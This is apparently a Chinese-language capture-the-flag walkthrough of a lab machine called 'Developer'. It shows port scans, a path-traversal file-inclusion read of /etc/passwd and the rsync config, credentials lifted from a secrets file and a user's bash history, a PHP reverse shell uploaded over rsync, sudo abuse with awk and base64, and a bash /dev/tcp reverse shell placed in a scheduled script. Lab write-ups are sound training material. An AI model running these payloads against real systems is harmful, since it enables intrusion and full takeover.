# 靶场搭建
下载:Developer
Nat,IP: 192.168.1.182
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Atlanta - Free business bootstrap template | |
|_http-server-header: Apache/2.4.56 (Debian) |
┌──(root㉿kali)-[~/Desktop] | |
└─# nmap -6 -p- -A fe80::20c:29ff:fe23:ad99%eth0 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-04 04:47 EDT | |
Nmap scan report for fe80::20c:29ff:fe23:ad99 | |
Host is up (0.00094s latency). | |
Not shown: 65532 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
873/tcp open rsync (protocol version 31) |
80 端口打开随便点点发现 LFI: http://192.168.1.182/pagecontact.php?page=contact.html
包含: curl http://192.168.1.182/pagecontact.php?page=....//....//....///etc/passwd
root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin | |
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | |
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin | |
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin | |
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin | |
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin | |
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin | |
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin | |
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin | |
mike:x:1001:1001::/home/mike:/bin/bash | |
james:x:1002:1002::/home/james:/bin/bash | |
dev:x:1000:1000::/home/dev:/bin/bash |
ipv6 下有 rsync 服务,包含一下配置文件看看:
┌──(root㉿kali)-[~/Desktop] | |
└─# curl http://192.168.1.182/pagecontact.php?page=....//....//....///etc/rsyncd.conf | |
motd file = /etc/Rsyncd.motd | |
lock file = /var/run/Rsync.lock | |
log file = /var/log/Rsyncd.log | |
pid file = /var/run/Rsyncd.pid | |
[developer_resource] | |
path = /var/www/html/rsync_uploads | |
comment = developer_resource | |
uid = 0 | |
gid = 0 | |
read only = no | |
list = no | |
auth users = dev | |
secrets file = /etc/rsyncd.secrets |
再看一下 secrets,拿到账号密码: dev:d3vs3cur3p4ss
传个反弹 shell 脚本上去 rsync --ipv6 shell.php [dev@fe80::20c:29ff:fe23:ad99%eth0]::developer_resource/shell.php
监听、访问 http://192.168.1.182/rsync_uploads/shell.php 拿到 shell
反弹 shell 我用:Chankro 生成的
# 提权
sudo -u mike awk 'BEGIN {system("/bin/sh")}' 拿到 mike 的权限
sudo -u james base64 /home/james/.bash_history | base64 -d 拿到 james 的密码: j4m3$B1GM@n 。su 过去
用户目录下有一个 task.sh 的文件,我直接删了重新建一个 task.sh 写入反弹 shell
james@developer:~$ cat task.sh | |
#!/bin/bash | |
bash -c 'bash -i >& /dev/tcp/192.168.1.129/8888 0>&1' |
监听,稍等片刻拿到 root 的 shell
